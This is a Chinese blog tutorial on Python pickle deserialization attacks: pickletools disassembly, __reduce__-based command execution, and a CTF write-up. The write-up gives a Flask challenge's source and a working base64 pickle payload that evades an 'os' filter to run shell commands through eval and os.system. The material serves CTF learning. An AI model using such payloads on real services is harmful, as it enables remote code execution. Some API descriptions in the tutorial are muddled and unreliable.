Python pickle反序列化

2024-06-11 22:36
文章标签 python 序列化 pickle

本文主要是介绍Python pickle反序列化,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

基础知识

Pickle

Pickle在Python中是一个用于序列化(将对象转换为字节流)和反序列化(将字节流转换回对象)的标准库模块。它主要用于将Python对象保存到文件或通过网络进行传输,使得数据可以跨会话和不同的Python程序共享。

python序列化和php序列化都是将对象序列化为字符串来方便存储,只是python的序列化没有php序列化那么多的方法之间的调用触发,python序列化是通过构造恶意语句,实现命令执行

Pickle常用的方法
import pickle
a_list = ['a','b','c']
print(pickle.dumps(a_list,protocol=0))pickle.loads()
pickle.load()

pickle构造出的字符串,有很多个版本。在pickle.loads时,可以用Protocol参数指定协议版本,例如指定为0号版本;目前这些协议有0,2,3,4号版本,默认为3号版本。这所有版本中,0号版本是人类最可读的;之后的版本加入了一大堆不可打印字符,不过这些新加的东西都只是为了优化,本质上没有太大的改动。pickle协议是向前兼容的。0号版本的字符串可以直接交给pickle.loads(),不用担心引发什么意外。

pickle.dumps和pickle.loads

pickle.dump:将对象序列化为字符串

pickle.dumps:将对象序列化为字符串并存储为文件

pickle.loads:将字符串反序列化为对象,从文件中读取数据

pickle.load:将字符串反序列化为对象

当我们自定义的class中出现"aaa=123"这样的赋值是,要写一个__init__方法,否则aaa是不会被打包的

看下对比

 pickletools

  pickletools是python自带的调试器,一般使用到它的两种功能:一.反汇编一个被打包的字符串,二.优化一个被打包的字符串

反汇编功能

b'\x80\x04\x95H\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x03abc\x94\x93\x94)\x81\x94}\x94(\x8c\x03aaa\x94K{\x8c\x03bbb\x94]\x94(\x8c\x04fuck\x94h\x08e\x8c\x03ccc\x94\x8c\x08fuck day\x94ub.'0: \x80 PROTO      42: \x95 FRAME      7211: \x8c SHORT_BINUNICODE '__main__'21: \x94 MEMOIZE    (as 0)22: \x8c SHORT_BINUNICODE 'abc'27: \x94 MEMOIZE    (as 1)28: \x93 STACK_GLOBAL29: \x94 MEMOIZE    (as 2)30: )    EMPTY_TUPLE31: \x81 NEWOBJ32: \x94 MEMOIZE    (as 3)33: }    EMPTY_DICT34: \x94 MEMOIZE    (as 4)35: (    MARK36: \x8c     SHORT_BINUNICODE 'aaa'41: \x94     MEMOIZE    (as 5)42: K        BININT1    12344: \x8c     SHORT_BINUNICODE 'bbb'49: \x94     MEMOIZE    (as 6)50: ]        EMPTY_LIST51: \x94     MEMOIZE    (as 7)52: (        MARK53: \x8c         SHORT_BINUNICODE 'fuck'59: \x94         MEMOIZE    (as 8)60: h            BINGET     862: e            APPENDS    (MARK at 52)63: \x8c     SHORT_BINUNICODE 'ccc'68: \x94     MEMOIZE    (as 9)69: \x8c     SHORT_BINUNICODE 'fuck day'79: \x94     MEMOIZE    (as 10)80: u        SETITEMS   (MARK at 35)81: b    BUILD82: .    STOP
highest protocol among opcodes = 4

解析字符串,并且把字符串的操作回显出来,也就是汇编指令

优化功能

b'\x80\x04\x95>\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x8c\x03abc\x93)\x81}(\x8c\x03aaaK{\x8c\x03bbb](\x8c\x04fuck\x94h\x00e\x8c\x03ccc\x8c\x08fuck dayub.'0: \x80 PROTO      42: \x95 FRAME      6211: \x8c SHORT_BINUNICODE '__main__'21: \x8c SHORT_BINUNICODE 'abc'26: \x93 STACK_GLOBAL27: )    EMPTY_TUPLE28: \x81 NEWOBJ29: }    EMPTY_DICT30: (    MARK31: \x8c     SHORT_BINUNICODE 'aaa'36: K        BININT1    12338: \x8c     SHORT_BINUNICODE 'bbb'43: ]        EMPTY_LIST44: (        MARK45: \x8c         SHORT_BINUNICODE 'fuck'51: \x94         MEMOIZE    (as 0)52: h            BINGET     054: e            APPENDS    (MARK at 44)55: \x8c     SHORT_BINUNICODE 'ccc'60: \x8c     SHORT_BINUNICODE 'fuck day'70: u        SETITEMS   (MARK at 30)71: b    BUILD72: .    STOP

优化了字符串变的更短,汇编指令中也优化了不必要的指令

利用pickletools,我们能很方便地看清楚每条语句的作用、检验我们手动构造出的字符串是否合法

__reduce__

ctf中pickle常利用的点就是reduce方法,指令码为R

__reduce__方法的工作原理

  • 取当前栈的栈顶记为args,然后把它弹掉。
  • 取当前栈的栈顶记为f,然后把它弹掉。
  • args为参数,执行函数f,把结果压进当前栈。
利用__reduce__

 对于reduce的利用一般是通过reduce构造恶意的字符串,当字符串被反序列化时,reduce就会触发,那么攻击对象的代码中没有reduce方法怎么办?只要存在R指令,reduce方法就能触发,不论在代码中是否存在reduce

构造一个恶意字符串

浅浅解释一下os.system是os标准库中用来执行shell命令的语句,以此来进行命令执行

将生成的payload拿到不存在reduce,存在R指令的代码中进行反序列化仍然能够执行

刚刚接触python反序列化暂时没有多深的学习,可以去学习从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势

例题

[HZNUCTF 2023 preliminary]pickle

打开就是源码,浅浅分析一下

import base64
import pickle
from flask import Flask, requestapp = Flask(__name__)@app.route('/')
def index():with open('app.py', 'r') as f:return f.read()@app.route('/calc', methods=['GET'])
def getFlag():payload = request.args.get("payload")pickle.loads(base64.b64decode(payload).replace(b'os', b''))return "ganbadie!"@app.route('/readFile', methods=['GET'])
def readFile():filename = request.args.get('filename').replace("flag", "????")with open(filename, 'r') as f:return f.read()if __name__ == '__main__':app.run(host='0.0.0.0')

给了三个路由,第一个路由就是当前页面

第二个路由/calc

GET传参的方式访问/calc页面,给了一个参数payload,将get传参的payload进行加密后反序列化输出,并且替换payload中的os为空

第三个路由/readFile

给了参数filename,并且过滤了flag,在传参后用只读方式打开filename并且保存为f,输出f的内容

构造恶意字符串命令执行

考虑到在第二个路由中进行反序列化之后,在第三个路由中进行读取所以用tee命令写入到文件中进行读取

import base64
import pickle
class gg():def __reduce__(self):return (eval,("__import__('o'+'s').system('ls |tee a')",))
a=gg()
b=pickle.dumps(a)
print(base64.b64encode(b))

读取根目录下文件

假flag,到环境变量中找找

 

在环境变量中找到flag

这篇关于Python pickle反序列化的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1052449

相关文章

python: 多模块(.py)中全局变量的导入

文章目录 global关键字可变类型和不可变类型数据的内存地址单模块(单个py文件)的全局变量示例总结 多模块(多个py文件)的全局变量from x import x导入全局变量示例 import x导入全局变量示例 总结 global关键字 global 的作用范围是模块(.py)级别: 当你在一个模块(文件)中使用 global 声明变量时,这个变量只在该模块的全局命名空

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

【机器学习】高斯过程的基本概念和应用领域以及在python中的实例

引言 高斯过程(Gaussian Process,简称GP)是一种概率模型,用于描述一组随机变量的联合概率分布,其中任何一个有限维度的子集都具有高斯分布 文章目录 引言一、高斯过程1.1 基本定义1.1.1 随机过程1.1.2 高斯分布 1.2 高斯过程的特性1.2.1 联合高斯性1.2.2 均值函数1.2.3 协方差函数(或核函数) 1.3 核函数1.4 高斯过程回归(Gauss

【学习笔记】 陈强-机器学习-Python-Ch15 人工神经网络(1)sklearn

系列文章目录 监督学习:参数方法 【学习笔记】 陈强-机器学习-Python-Ch4 线性回归 【学习笔记】 陈强-机器学习-Python-Ch5 逻辑回归 【课后题练习】 陈强-机器学习-Python-Ch5 逻辑回归(SAheart.csv) 【学习笔记】 陈强-机器学习-Python-Ch6 多项逻辑回归 【学习笔记 及 课后题练习】 陈强-机器学习-Python-Ch7 判别分析 【学

nudepy,一个有趣的 Python 库!

更多资料获取 📚 个人网站:ipengtao.com 大家好,今天为大家分享一个有趣的 Python 库 - nudepy。 Github地址:https://github.com/hhatto/nude.py 在图像处理和计算机视觉应用中,检测图像中的不适当内容(例如裸露图像)是一个重要的任务。nudepy 是一个基于 Python 的库,专门用于检测图像中的不适当内容。该

pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定

在 Python 开发中,管理依赖关系是一项繁琐且容易出错的任务。手动更新依赖版本、处理冲突、确保一致性等等,都可能让开发者感到头疼。而 pip-tools 为开发者提供了一套稳定可靠的解决方案。 什么是 pip-tools? pip-tools 是一组命令行工具,旨在简化 Python 依赖关系的管理,确保项目环境的稳定性和可重复性。它主要包含两个核心工具:pip-compile 和 pip

HTML提交表单给python

python 代码 from flask import Flask, request, render_template, redirect, url_forapp = Flask(__name__)@app.route('/')def form():# 渲染表单页面return render_template('./index.html')@app.route('/submit_form',

Python QT实现A-star寻路算法

目录 1、界面使用方法 2、注意事项 3、补充说明 用Qt5搭建一个图形化测试寻路算法的测试环境。 1、界面使用方法 设定起点: 鼠标左键双击,设定红色的起点。左键双击设定起点,用红色标记。 设定终点: 鼠标右键双击,设定蓝色的终点。右键双击设定终点,用蓝色标记。 设置障碍点: 鼠标左键或者右键按着不放,拖动可以设置黑色的障碍点。按住左键或右键并拖动,设置一系列黑色障碍点

Python:豆瓣电影商业数据分析-爬取全数据【附带爬虫豆瓣,数据处理过程,数据分析,可视化,以及完整PPT报告】

**爬取豆瓣电影信息,分析近年电影行业的发展情况** 本文是完整的数据分析展现,代码有完整版,包含豆瓣电影爬取的具体方式【附带爬虫豆瓣,数据处理过程,数据分析,可视化,以及完整PPT报告】   最近MBA在学习《商业数据分析》,大实训作业给了数据要进行数据分析,所以先拿豆瓣电影练练手,网络上爬取豆瓣电影TOP250较多,但对于豆瓣电影全数据的爬取教程很少,所以我自己做一版。 目

【Python报错已解决】AttributeError: ‘list‘ object has no attribute ‘text‘

🎬 鸽芷咕:个人主页  🔥 个人专栏: 《C++干货基地》《粉丝福利》 ⛺️生活的理想,就是为了理想的生活! 文章目录 前言一、问题描述1.1 报错示例1.2 报错分析1.3 解决思路 二、解决方法2.1 方法一:检查属性名2.2 步骤二:访问列表元素的属性 三、其他解决方法四、总结 前言 在Python编程中,属性错误(At